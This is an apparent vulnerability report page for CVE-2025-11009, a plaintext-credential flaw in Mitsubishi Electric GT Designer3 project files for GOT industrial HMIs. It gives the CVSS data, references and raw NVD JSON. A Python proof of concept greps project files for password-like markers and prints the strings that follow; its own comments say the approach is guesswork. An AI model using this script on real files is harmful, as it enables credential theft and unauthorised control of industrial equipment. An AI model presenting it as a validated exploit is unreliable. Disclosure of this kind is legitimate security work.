Security Vulnerability Report
CVE-2025-11009 CVSS 5.1 MEDIUM

Published: 2025-12-17 02:16:01
Last Modified: 2026-04-15 00:35:42

Description

Cleartext Storage of Sensitive Information vulnerability in Mitsubishi Electric GT Designer3 Version1 (GOT2000) all versions and Mitsubishi Electric GT Designer3 Version1 (GOT1000) all versions allows a local unauthenticated attacker to obtain plaintext credentials from the project file for GT Designer3. This could allow the attacker to illegally operate the GOT2000 series or GOT1000 series using the obtained credentials.

CVSS Details

CVSS Score: 5.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Mitsubishi Electric GT Designer3 Version1 (GOT2000) - all versions
Mitsubishi Electric GT Designer3 Version1 (GOT1000) - all versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-11009 PoC - GT Designer3 Project File Credential Extraction
# This PoC demonstrates extracting plaintext credentials from GT Designer3 project files
import struct
import os


def parse_gt_project_file(filepath):
    """
    Parse GT Designer3 project file and extract plaintext credentials
    """
    credentials = []

    if not os.path.exists(filepath):
        print(f"[-] File not found: {filepath}")
        return credentials

    with open(filepath, 'rb') as f:
        data = f.read()

    # GT Designer3 project file signature
    if b'GOT2000' in data or b'GOT1000' in data:
        print(f"[+] Valid GT Designer3 project file detected")

        # Search for common credential-related patterns
        # These patterns may vary based on actual file format
        credential_markers = [
            b'PASSWORD',
            b'PASSWD',
            b'AUTH',
            b'USER',
            b'LOGIN'
        ]

        for marker in credential_markers:
            offset = 0
            while True:
                pos = data.find(marker, offset)
                if pos == -1:
                    break

                # Extract potential credential string after marker
                # Adjust extraction range based on file format analysis
                start = pos + len(marker)
                end = min(start + 128, len(data))
                chunk = data[start:end]

                # Look for printable ASCII strings (potential credentials)
                printable = ''
                for byte in chunk:
                    if 32 <= byte <= 126:
                        printable += chr(byte)
                    else:
                        if len(printable) >= 4:  # Min password length
                            credentials.append(printable)
                        printable = ''

                if len(credentials) > 10:
                    break
                offset = pos + 1

    return credentials


def main():
    project_file = input("Enter path to GT Designer3 project file (.gt3/.gpf): ")
    creds = parse_gt_project_file(project_file)

    if creds:
        print(f"\n[+] Found {len(creds)} potential credentials:")
        for i, cred in enumerate(set(creds), 1):
            print(f" {i}. {cred}")
    else:
        print("[-] No credentials found or file format not recognized")


if __name__ == "__main__":
    main()

# Note: This is a simplified PoC. Actual file format analysis requires:
# 1. Reverse engineering the GT Designer3 project file format
# 2. Identifying exact storage locations for different credential types
# 3. Testing with actual project files to validate extraction method
```

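References

https://jvn.jp/vu/JVNVU99629801/
https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-017_en.pdf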

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11009", "sourceIdentifier": "[email protected]", "published": "2025-12-17T02:16:00.577", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cleartext Storage of Sensitive Information vulnerability in Mitsubishi Electric GT Designer3 Version1 (GOT2000) all versions and Mitsubishi Electric GT Designer3 Version1 (GOT1000) all versions allows a local unauthenticated attacker to obtain plaintext credentials from the project file for GT Designer3. This could allow the attacker to operate illegally GOT2000 series or GOT1000 series by using the obtained credentials."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.4, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-312"}]}], "references": [{"url": "https://jvn.jp/vu/JVNVU99629801/", "source": "[email protected]"}, {"url": "https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-017_en.pdf", "source": "[email protected]"}]}}